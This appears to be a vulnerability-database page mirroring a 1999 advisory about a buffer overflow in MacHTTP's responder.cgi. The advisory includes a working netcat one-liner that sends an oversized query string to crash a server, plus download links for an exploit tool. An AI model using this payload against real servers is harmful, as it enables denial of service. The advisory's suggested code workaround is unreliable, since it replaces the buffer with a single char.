Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mac.DoS.txt

🗓️ 17 Aug 1999 00:00:00Reported by EpicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 38 Views

Macintosh HTTP Server has buffer overflow vulnerability in responder.cgi causing Denial of Service.

Code
`Date: Fri, 16 Apr 1999 14:30:08 PDT  
From: Freaky <[email protected]>  
To: [email protected]  
Subject: Macintosh HTTP Server Vulns  
  
Hey Hey this is Freak from Freaks Macintosh Archives:  
http://freaky.staticusers.net/  
  
People are finally exploiting shit for the mac and noticing Denial of Service attacks here some listed below:  
  
Shilo v1.0b (macos)  
A Program that will exploit the buffer overflow in the responder.cgi on MacHTTP Servers. As always, The Source code to the  
program is available. by epic of mSec  
To download the exploit txt:http://freaky.staticusers.net/attack/responder-cgi.html  
  
To download the mac product:  
http://freaky.staticusers.net/attack/shilov1.0.sit  
  
to goto the creators site:  
mSec  
http://www.msec.net/   
  
  
----------[ http://freaky.staticusers.net/attack/responder-cgi.html ]----------  
  
___________________________  
/ / / /\  
______/ ____/ ____/ / /  
/ / / / ____/ /  
/ /____ / ____/ / /   
/ / / / / / / /  
/_/_/_/________/________/________/ /  
\_____\________\________\________\/  
/ . ../Macintosh Security/.. . /  
/________________________________/  
Presents:  
  
Responder.cgi Vulnerability  
Written by Epic, A Member of mSec <[email protected]>  
Released 4/9/99   
  
Responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You  
are at risk if your responder.cgi file contains the line of code:   
  
char PostArg_Search[256];   
  
which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested.   
  
Exploit Example: (nc is netcat from avian.org)  
$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80   
  
Possible Workaround:  
Remove responder.cgi from your /cgi-bin/ or change  
char PostArg_Search[256]; to  
char PostArg_Search;   
  
Epic <[email protected]>  
http://www.msec.net  
hotline://msec.net   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
macintosh securitydenial of serviceresponder.cgi vulnerabilitybuffer overflow exploitmsec site
38